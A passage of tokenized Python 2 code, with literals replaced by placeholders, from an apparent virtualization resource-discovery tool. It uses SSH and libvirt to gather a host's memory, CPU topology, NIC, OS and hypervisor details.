hypervisor_possible_types <EOL> possible_domain_types = definitionsClass . hypervisor_possible_domain_types <EOL> def __init__ ( self ) : <EOL> self . type_ = None <EOL> self . version = None <EOL> self . lib_version = None <EOL> self . domains = list ( ) <EOL> def set ( self , hypervisor , version , lib_version , domains ) : <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( hypervisor , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( version , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( lib_version , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( domains , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not hypervisor in self . possible_types : <EOL> warning_text += "<STR_LIT>" % ( hypervisor , str ( self . possible_types ) ) <EOL> valid_domain_found = False <EOL> for domain in domains : <EOL> if not isinstance ( domain , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if domain in self . possible_domain_types : <EOL> valid_domain_found = True <EOL> self . domains . append ( domain ) <EOL> if not valid_domain_found : <EOL> warning_text += '<STR_LIT>' % str ( self . possible_domain_types ) <EOL> ( self . version , self . lib_version , self . type_ ) = ( version , lib_version , hypervisor ) <EOL> return ( True , warning_text ) <EOL> def assign ( self , hypervisor ) : <EOL> ( self . version , self . lib_version , self . type_ ) = ( hypervisor . version , hypervisor . lib_version , hypervisor . type_ ) <EOL> for domain in hypervisor . domains : <EOL> self . domains . append ( domain ) <EOL> return <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . version ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . lib_version ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . domains ) + '<STR_LIT:\n>' <EOL> return text <EOL> class OpSys ( ) : <EOL> possible_id = definitionsClass . 
os_possible_id <EOL> possible_types = definitionsClass . os_possible_types <EOL> possible_architectures = definitionsClass . os_possible_architectures <EOL> def __init__ ( self ) : <EOL> self . id_ = None <EOL> self . type_ = None <EOL> self . bit_architecture = None <EOL> def set ( self , id_ , type_ , bit_architecture ) : <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( type_ , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( id_ , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( bit_architecture , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not type_ in self . possible_types : <EOL> warning_text += "<STR_LIT>" % ( type_ , str ( self . possible_types ) ) <EOL> if not id_ in self . possible_id : <EOL> warning_text += "<STR_LIT>" % ( id_ , str ( self . possible_id ) ) <EOL> if not bit_architecture in self . possible_architectures : <EOL> warning_text += "<STR_LIT>" % ( bit_architecture , str ( self . possible_architectures ) ) <EOL> ( self . id_ , self . type_ , self . bit_architecture ) = ( id_ , type_ , bit_architecture ) <EOL> return ( True , warning_text ) <EOL> def assign ( self , os ) : <EOL> ( self . id_ , self . type_ , self . bit_architecture ) = ( os . id_ , os . type_ , os . bit_architecture ) <EOL> return <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + self . id_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . bit_architecture + '<STR_LIT:\n>' <EOL> return text <EOL> def get_hostname ( virsh_conn ) : <EOL> return virsh_conn . getHostname ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> def get_hugepage_size ( ssh_conn ) : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> mem = stdout . 
read ( ) <EOL> if mem == "<STR_LIT>" : <EOL> return <NUM_LIT:0> <EOL> return int ( mem ) <EOL> def get_hugepage_nr ( ssh_conn , hugepage_sz , node_id ) : <EOL> command = '<STR_LIT>' + str ( node_id ) + '<STR_LIT>' + str ( hugepage_sz / <NUM_LIT> ) + '<STR_LIT>' <EOL> ( _ , stdout , _ ) = ssh_conn . exec_command ( command ) <EOL> try : <EOL> value = int ( stdout . read ( ) ) <EOL> except : <EOL> value = <NUM_LIT:0> <EOL> return value <EOL> def get_memory_information ( ssh_conn , virsh_conn , memory_nodes ) : <EOL> warning_text = "<STR_LIT>" <EOL> tree = ElementTree . fromstring ( virsh_conn . getSysinfo ( <NUM_LIT:0> ) ) <EOL> memory_dict = dict ( ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> locator_f = size_f = freq_f = type_f = formfactor_f = False <EOL> module_form_factor = "<STR_LIT>" <EOL> for entry in target . findall ( "<STR_LIT>" ) : <EOL> if entry . get ( "<STR_LIT:name>" ) == '<STR_LIT:size>' : <EOL> size_f = True <EOL> size_split = entry . text . split ( '<STR_LIT:U+0020>' ) <EOL> if size_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> <EOL> elif size_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> elif size_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) * <NUM_LIT> <EOL> else : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> freq_f = True <EOL> freq_split = entry . text . 
split ( '<STR_LIT:U+0020>' ) <EOL> if freq_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_freq = int ( freq_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> <EOL> elif freq_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_freq = int ( freq_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> elif freq_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_freq = int ( freq_split [ <NUM_LIT:0> ] ) * <NUM_LIT> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT:type>' : <EOL> type_f = True <EOL> module_type = entry . text <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> formfactor_f = True <EOL> module_form_factor = entry . text <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' and not locator_f : <EOL> locator = entry . text <EOL> pos = locator . find ( module_form_factor ) <EOL> if module_form_factor == locator [ <NUM_LIT:0> : len ( module_form_factor ) ] : <EOL> pos = len ( module_form_factor ) + <NUM_LIT:1> <EOL> else : <EOL> pos = <NUM_LIT:0> <EOL> if locator [ pos ] in "<STR_LIT>" : <EOL> locator_f = True <EOL> node_id = ord ( locator [ pos ] ) - ord ( '<STR_LIT:A>' ) <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> locator = entry . text <EOL> pos = locator . find ( "<STR_LIT>" ) <EOL> if pos >= <NUM_LIT:0> and len ( locator ) > pos + <NUM_LIT:5> : <EOL> if locator [ pos + <NUM_LIT:5> ] in ( "<STR_LIT>" ) : <EOL> node_id = int ( locator [ pos + <NUM_LIT:5> ] ) <EOL> locator_f = True <EOL> if locator_f and size_f and freq_f and type_f and formfactor_f : <EOL> if node_id not in memory_dict : <EOL> memory_dict [ node_id ] = [ ] <EOL> module = MemoryModule ( ) <EOL> ( return_status , code ) = module . set ( locator , module_type , module_freq , module_size , module_form_factor ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> memory_dict [ node_id ] . 
append ( module ) <EOL> if code not in warning_text : <EOL> warning_text += code <EOL> hugepage_sz = get_hugepage_size ( ssh_conn ) <EOL> for node_id , modules in memory_dict . iteritems ( ) : <EOL> memory_node = MemoryNode ( ) <EOL> memory_node . set ( modules , hugepage_sz , get_hugepage_nr ( ssh_conn , hugepage_sz , node_id ) ) <EOL> memory_nodes [ node_id ] = memory_node <EOL> return ( True , warning_text ) <EOL> def get_cpu_topology_ht ( ssh_conn , topology ) : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> sockets = [ ] <EOL> cores = [ ] <EOL> core_map = { } <EOL> core_details = [ ] <EOL> core_lines = { } <EOL> for line in stdout . readlines ( ) : <EOL> if len ( line . strip ( ) ) != <NUM_LIT:0> : <EOL> name , value = line . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> core_lines [ name . strip ( ) ] = value . strip ( ) <EOL> else : <EOL> core_details . append ( core_lines ) <EOL> core_lines = { } <EOL> for core in core_details : <EOL> for field in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if field not in core : <EOL> return ( False , '<STR_LIT>' + field + '<STR_LIT>' ) <EOL> core [ field ] = int ( core [ field ] ) <EOL> if core [ "<STR_LIT>" ] not in cores : <EOL> cores . append ( core [ "<STR_LIT>" ] ) <EOL> if core [ "<STR_LIT>" ] not in sockets : <EOL> sockets . append ( core [ "<STR_LIT>" ] ) <EOL> key = ( core [ "<STR_LIT>" ] , core [ "<STR_LIT>" ] ) <EOL> if key not in core_map : <EOL> core_map [ key ] = [ ] <EOL> core_map [ key ] . append ( core [ "<STR_LIT>" ] ) <EOL> for s in sockets : <EOL> hyperthreaded_cores = list ( ) <EOL> for c in cores : <EOL> hyperthreaded_cores . 
append ( core_map [ ( s , c ) ] ) <EOL> topology [ s ] = hyperthreaded_cores <EOL> return ( True , "<STR_LIT>" ) <EOL> def get_processor_information ( ssh_conn , vish_conn , processors ) : <EOL> warning_text = "<STR_LIT>" <EOL> capabilities = list ( ) <EOL> tree = ElementTree . fromstring ( vish_conn . getCapabilities ( ) ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> if target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> elif target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> elif target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' or target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> elif target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> target = tree . find ( "<STR_LIT>" ) <EOL> if target . text == '<STR_LIT>' or target . text == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> line = stdout . readline ( ) <EOL> if '<STR_LIT>' in line or '<STR_LIT>' in line : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> if '<STR_LIT>' in stdout . read ( ) : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . 
SSHException ( command + '<STR_LIT>' + error ) <EOL> if len ( stdout . read ( ) ) > <NUM_LIT:0> : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> topology = dict ( ) <EOL> if '<STR_LIT>' in capabilities : <EOL> ( return_status , code ) = get_cpu_topology_ht ( ssh_conn , topology ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> warning_text += code <EOL> else : <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> socket_id = int ( target . get ( "<STR_LIT:id>" ) ) <EOL> topology [ socket_id ] = list ( ) <EOL> for cpu in target . findall ( "<STR_LIT>" ) : <EOL> topology [ socket_id ] . append ( int ( cpu . get ( "<STR_LIT:id>" ) ) ) <EOL> tree = ElementTree . fromstring ( vish_conn . getSysinfo ( <NUM_LIT:0> ) ) <EOL> not_populated = False <EOL> socket_id = - <NUM_LIT:1> <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> count = <NUM_LIT:0> <EOL> socket_id += <NUM_LIT:1> <EOL> for entry in target . findall ( "<STR_LIT>" ) : <EOL> if entry . get ( "<STR_LIT:name>" ) == "<STR_LIT:status>" : <EOL> if entry . text [ <NUM_LIT:0> : <NUM_LIT:11> ] == "<STR_LIT>" : <EOL> not_populated = True <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> socket_text = entry . text <EOL> if socket_text . startswith ( '<STR_LIT>' ) : <EOL> socket_text = socket_text . strip ( '<STR_LIT>' ) <EOL> socket_text = socket_text . strip ( ) <EOL> if socket_text . isdigit ( ) and int ( socket_text ) < <NUM_LIT:9> and int ( socket_text ) > <NUM_LIT:0> : <EOL> socket_id = int ( socket_text ) - <NUM_LIT:1> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> family = entry . text <EOL> count += <NUM_LIT:1> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> manufacturer = entry . text <EOL> count += <NUM_LIT:1> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT:version>' : <EOL> version = entry . text . 
strip ( ) <EOL> count += <NUM_LIT:1> <EOL> if count != <NUM_LIT:3> : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not_populated : <EOL> continue <EOL> processor = ProcessorNode ( ) <EOL> ( return_status , code ) = processor . set ( socket_id , family , manufacturer , version , capabilities , topology [ socket_id ] ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> if code not in warning_text : <EOL> warning_text += code <EOL> processors [ socket_id ] = processor <EOL> return ( True , warning_text ) <EOL> def get_nic_information ( ssh_conn , virsh_conn , nic_topology ) : <EOL> warning_text = "<STR_LIT>" <EOL> net_devices = virsh_conn . listDevices ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> print virsh_conn . listDevices ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> for device in net_devices : <EOL> try : <EOL> net_XML = ElementTree . fromstring ( virsh_conn . nodeDeviceLookupByName ( device ) . XMLDesc ( <NUM_LIT:0> ) ) <EOL> parent = net_XML . find ( '<STR_LIT>' ) <EOL> if parent == None : <EOL> print '<STR_LIT>' + device <EOL> continue <EOL> if parent . text == '<STR_LIT>' : <EOL> continue <EOL> if not parent . text . startswith ( '<STR_LIT>' ) : <EOL> print device + '<STR_LIT>' <EOL> continue <EOL> interface = net_XML . find ( '<STR_LIT>' ) . text <EOL> mac = net_XML . find ( '<STR_LIT>' ) . text <EOL> pci_XML = ElementTree . fromstring ( virsh_conn . nodeDeviceLookupByName ( parent . text ) . XMLDesc ( <NUM_LIT:0> ) ) <EOL> name = pci_XML . find ( '<STR_LIT:name>' ) . text . split ( '<STR_LIT:_>' ) <EOL> pci = name [ <NUM_LIT:1> ] + '<STR_LIT::>' + name [ <NUM_LIT:2> ] + '<STR_LIT::>' + name [ <NUM_LIT:3> ] + '<STR_LIT:.>' + name [ <NUM_LIT:4> ] <EOL> capability = pci_XML . find ( '<STR_LIT>' ) <EOL> if capability . get ( '<STR_LIT:type>' ) != '<STR_LIT>' : <EOL> print device + '<STR_LIT>' + parent . text <EOL> continue <EOL> slot = capability . find ( '<STR_LIT>' ) . text <EOL> bus = capability . find ( '<STR_LIT>' ) . 
text <EOL> node_id = None <EOL> numa_ = capability . find ( '<STR_LIT>' ) <EOL> if numa_ != None : <EOL> node_id = numa_ . get ( '<STR_LIT>' ) ; <EOL> if node_id != None : node_id = int ( node_id ) <EOL> if slot == None or bus == None : <EOL> print device + '<STR_LIT>' + parent . text <EOL> continue <EOL> if slot != '<STR_LIT:0>' : <EOL> virtual = True <EOL> capability_pf = capability . find ( '<STR_LIT>' ) <EOL> if capability_pf . get ( '<STR_LIT:type>' ) != '<STR_LIT>' : <EOL> print '<STR_LIT>' + parent . text <EOL> continue <EOL> PF_pci = capability_pf . find ( '<STR_LIT:address>' ) . attrib <EOL> PF_pci_text = PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] + '<STR_LIT::>' + PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] + '<STR_LIT::>' + PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] + '<STR_LIT:.>' + PF_pci [ '<STR_LIT>' ] . split ( '<STR_LIT:x>' ) [ <NUM_LIT:1> ] <EOL> else : <EOL> virtual = False <EOL> if node_id == None : <EOL> node_id = int ( bus ) >> <NUM_LIT:6> <EOL> if not virtual : <EOL> command = '<STR_LIT>' + interface + '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> print '<STR_LIT>' + command + '<STR_LIT:\n>' + error <EOL> continue <EOL> for line in stdout . readlines ( ) : <EOL> line = line . strip ( ) . rstrip ( '<STR_LIT:\n>' ) . split ( '<STR_LIT>' ) <EOL> if line [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> if line [ <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> speed = int ( line [ <NUM_LIT:1> ] . split ( '<STR_LIT:M>' ) [ <NUM_LIT:0> ] ) * int ( <NUM_LIT> ) <EOL> elif line [ <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> speed = int ( line [ <NUM_LIT:1> ] . split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] ) * int ( <NUM_LIT> ) <EOL> elif line [ <NUM_LIT:1> ] . endswith ( '<STR_LIT>' ) : <EOL> speed = int ( line [ <NUM_LIT:1> ] . 
split ( '<STR_LIT>' ) [ <NUM_LIT:0> ] ) * int ( <NUM_LIT> ) <EOL> else : <EOL> speed = <NUM_LIT:0> <EOL> elif line [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> if line [ <NUM_LIT:1> ] == '<STR_LIT:yes>' : <EOL> enabled = True <EOL> else : <EOL> enabled = False <EOL> else : <EOL> print '<STR_LIT>' + command + '<STR_LIT::>' <EOL> print line <EOL> continue <EOL> if not node_id in nic_topology : <EOL> nic_topology [ node_id ] = list ( ) <EOL> nic_topology [ node_id ] . append ( Nic ( ) ) <EOL> nic = nic_topology [ node_id ] [ <NUM_LIT:0> ] <EOL> port = Port ( ) <EOL> port . name = interface <EOL> port . virtual = virtual <EOL> port . speed = speed <EOL> if virtual : <EOL> port . available_bw = <NUM_LIT:0> <EOL> port . PF_pci_device_id = PF_pci_text <EOL> else : <EOL> port . available_bw = speed <EOL> if speed == <NUM_LIT:0> : <EOL> port . enabled = False <EOL> else : <EOL> port . enabled = enabled <EOL> port . eligible = virtual <EOL> port . mac = mac <EOL> port . pci_device_id = pci <EOL> port . pci_device_id_split = name [ <NUM_LIT:1> : ] <EOL> nic . add_port ( port ) <EOL> except Exception , e : <EOL> print '<STR_LIT>' + str ( e ) <EOL> for nic in nic_topology . itervalues ( ) : <EOL> for port in nic [ <NUM_LIT:0> ] . ports . itervalues ( ) : <EOL> if port . virtual : <EOL> enabled = nic [ <NUM_LIT:0> ] . ports . get ( port . PF_pci_device_id ) <EOL> if enabled == None : <EOL> return ( False , '<STR_LIT>' + port . PF_pci_device_id + '<STR_LIT>' + port . pci_device_id + '<STR_LIT>' ) <EOL> if nic [ <NUM_LIT:0> ] . ports [ port . PF_pci_device_id ] . enabled : <EOL> port . enabled = True <EOL> else : <EOL> port . enabled = False <EOL> return ( True , warning_text ) <EOL> def get_nic_information_old ( ssh_conn , nic_topology ) : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . 
SSHException ( command + '<STR_LIT>' + error ) <EOL> tree = ElementTree . fromstring ( stdout . read ( ) ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> if target . get ( "<STR_LIT:type>" ) != "<STR_LIT>" : <EOL> continue <EOL> node_id = int ( target . get ( "<STR_LIT>" ) ) <EOL> nic_topology [ node_id ] = list ( ) <EOL> for entry in target . findall ( "<STR_LIT>" ) : <EOL> if entry . get ( "<STR_LIT:type>" ) != '<STR_LIT>' : <EOL> continue <EOL> nic_name = entry . get ( "<STR_LIT:name>" ) <EOL> model = None <EOL> nic = Nic ( ) <EOL> for pcidev in entry . findall ( "<STR_LIT:object>" ) : <EOL> if pcidev . get ( "<STR_LIT:type>" ) != '<STR_LIT>' : <EOL> continue <EOL> enabled = speed = mac = pci_busid = None <EOL> port = Port ( ) <EOL> model = pcidev . get ( "<STR_LIT:name>" ) <EOL> virtual = False <EOL> if '<STR_LIT>' in model : <EOL> virtual = True <EOL> pci_busid = pcidev . get ( "<STR_LIT>" ) <EOL> for osdev in pcidev . findall ( "<STR_LIT:object>" ) : <EOL> name = osdev . get ( "<STR_LIT:name>" ) <EOL> for info in osdev . findall ( "<STR_LIT:info>" ) : <EOL> if info . get ( "<STR_LIT:name>" ) != '<STR_LIT>' : <EOL> continue <EOL> mac = info . get ( "<STR_LIT:value>" ) <EOL> command = '<STR_LIT>' + name <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> return ( False , '<STR_LIT>' + name + '<STR_LIT>' + error ) <EOL> ethtool = stdout . read ( ) <EOL> if '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> elif '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> elif '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> elif '<STR_LIT>' in ethtool : <EOL> speed = <NUM_LIT> <EOL> else : <EOL> return ( False , '<STR_LIT>' + name ) <EOL> enabled = False <EOL> if '<STR_LIT>' in ethtool : <EOL> enabled = True <EOL> if speed != None and mac != None and pci_busid != None : <EOL> mac = mac . split ( '<STR_LIT::>' ) <EOL> pci_busid_split = re . 
split ( '<STR_LIT>' , pci_busid ) <EOL> port . set ( name , virtual , enabled , speed , mac , pci_busid , pci_busid_split ) <EOL> nic . add_port ( port ) <EOL> if len ( nic . ports ) > <NUM_LIT:0> : <EOL> if model != None : <EOL> nic . set_model ( model ) <EOL> else : <EOL> nic . set_model ( nic_name ) <EOL> nic_topology [ node_id ] . append ( nic ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def get_os_information ( ssh_conn , os ) : <EOL> warning_text = "<STR_LIT>" <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , _ ) = ssh_conn . exec_command ( command ) <EOL> id_text = stdout . read ( ) <EOL> if len ( id_text ) == <NUM_LIT:0> : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , _ ) = ssh_conn . exec_command ( command ) <EOL> id_text = stdout . read ( ) <EOL> if len ( id_text ) == <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( "<STR_LIT>" ) <EOL> id_ = id_text . rstrip ( '<STR_LIT:\n>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> type_ = stdout . read ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> bit_architecture = stdout . read ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> ( return_status , code ) = os . set ( id_ , type_ , bit_architecture ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> warning_text += code <EOL> return ( True , warning_text ) <EOL> def get_hypervisor_information ( virsh_conn , hypervisor ) : <EOL> type_ = virsh_conn . getType ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> version = virsh_conn . getVersion ( ) <EOL> lib_version = virsh_conn . 
getLibVersion ( ) <EOL> domains = list ( ) <EOL> tree = ElementTree . fromstring ( virsh_conn . getCapabilities ( ) ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> os_type = target . find ( "<STR_LIT>" ) . text <EOL> if os_type != '<STR_LIT>' : <EOL> continue <EOL> wordsize = int ( target . find ( '<STR_LIT>' ) . text ) <EOL> if wordsize == <NUM_LIT:64> : <EOL> for domain in target . findall ( "<STR_LIT>" ) : <EOL> domains . append ( domain . get ( "<STR_LIT:type>" ) ) <EOL> ( return_status , code ) = hypervisor . set ( type_ , version , lib_version , domains ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> return ( True , code ) <EOL> class RADavailableResourcesClass ( RADclass ) : <EOL> def __init__ ( self , resources ) : <EOL> """<STR_LIT>""" <EOL> self . reserved = dict ( ) <EOL> self . cores_consumption = None <EOL> self . machine = resources . machine <EOL> self . user = resources . user <EOL> self . password = resources . password <EOL> self . name = resources . name <EOL> self . nr_processors = resources . nr_processors <EOL> self . processor_family = resources . processor_family <EOL> self . processor_manufacturer = resources . processor_manufacturer <EOL> self . processor_version = resources . processor_version <EOL> self . processor_features = resources . processor_features <EOL> self . memory_type = resources . memory_type <EOL> self . memory_freq = resources . memory_freq <EOL> self . memory_nr_channels = resources . memory_nr_channels <EOL> self . memory_size = resources . memory_size <EOL> self . memory_hugepage_sz = resources . memory_hugepage_sz <EOL> self . hypervisor = Hypervisor ( ) <EOL> self . hypervisor . assign ( resources . hypervisor ) <EOL> self . os = OpSys ( ) <EOL> self . os . assign ( resources . os ) <EOL> self . nodes = dict ( ) <EOL> for node_k , node_v in resources . nodes . iteritems ( ) : <EOL> self . nodes [ node_k ] = Node ( ) <EOL> self . nodes [ node_k ] . 
assign ( node_v ) <EOL> return <EOL> def _get_cores_consumption_warnings ( self ) : <EOL> """<STR_LIT>""" <EOL> warnings = list ( ) <EOL> ( return_status , code ) = get_ssh_connection ( self . machine , self . user , self . password ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> ssh_conn = code <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> return ( False , error ) <EOL> self . cores_consumption = dict ( ) <EOL> for line in stdout . readlines ( ) : <EOL> cpu_usage_split = re . split ( '<STR_LIT>' , line . rstrip ( '<STR_LIT:\n>' ) ) <EOL> usage = <NUM_LIT:100> * ( <NUM_LIT:1> - float ( cpu_usage_split [ <NUM_LIT:10> ] ) ) <EOL> if usage > <NUM_LIT:0> : <EOL> self . cores_consumption [ int ( cpu_usage_split [ <NUM_LIT:1> ] ) ] = usage <EOL> ssh_conn . close ( ) <EOL> for _ , node_v in self . nodes . iteritems ( ) : <EOL> cores = node_v . processor . eligible_cores <EOL> for cpu in cores : <EOL> if len ( cpu ) > <NUM_LIT:1> : <EOL> for core in cpu : <EOL> if core in self . cores_consumption : <EOL> warnings . append ( '<STR_LIT>' + str ( core ) + '<STR_LIT>' + str ( self . cores_consumption [ core ] ) + '<STR_LIT:%>' ) <EOL> else : <EOL> if cpu in self . cores_consumption : <EOL> warnings . append ( '<STR_LIT>' + str ( core ) + '<STR_LIT>' + str ( self . cores_consumption [ cpu ] ) + '<STR_LIT:%>' ) <EOL> return warnings <EOL> def reserved_to_text ( self ) : <EOL> text = str ( ) <EOL> for VNFC_name , VNFC_reserved in self . reserved . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( VNFC_name ) + '<STR_LIT:\n>' <EOL> text += VNFC_reserved . to_text ( ) <EOL> return text <EOL> def obtain_usage ( self ) : <EOL> resp = dict ( ) <EOL> nodes = dict ( ) <EOL> ports_usage = dict ( ) <EOL> hugepage_size = dict ( ) <EOL> for node_k , node_v in self . nodes . 
